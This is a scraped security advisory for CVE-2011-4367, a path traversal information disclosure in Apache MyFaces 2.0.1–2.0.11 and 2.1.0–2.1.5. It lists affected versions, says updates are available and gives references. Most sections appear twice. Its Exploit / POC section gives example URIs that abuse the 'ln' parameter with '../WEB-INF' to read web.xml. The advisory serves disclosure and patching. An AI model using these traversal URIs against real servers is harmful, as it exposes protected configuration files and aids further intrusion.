Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
BID:51939
Info
Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| Bugtraq ID: | 51939 |
| Class: | Design Error |
| CVE: |
CVE-2011-4367 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2012 12:00AM |
| Updated: | Feb 09 2012 12:00AM |
| Credit: | Paul Nicolucci |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
Exploit / POC
Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
The following example URIs are available:
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
The following example URIs are available:
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
Solution / Fix
Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
References:
References:
- [SECURITY] CVE-2011-4367 Apache MyFaces information disclosure vulnerability (Leonardo Uribe)
- MyFaces Homepage (Apache Software Foundation)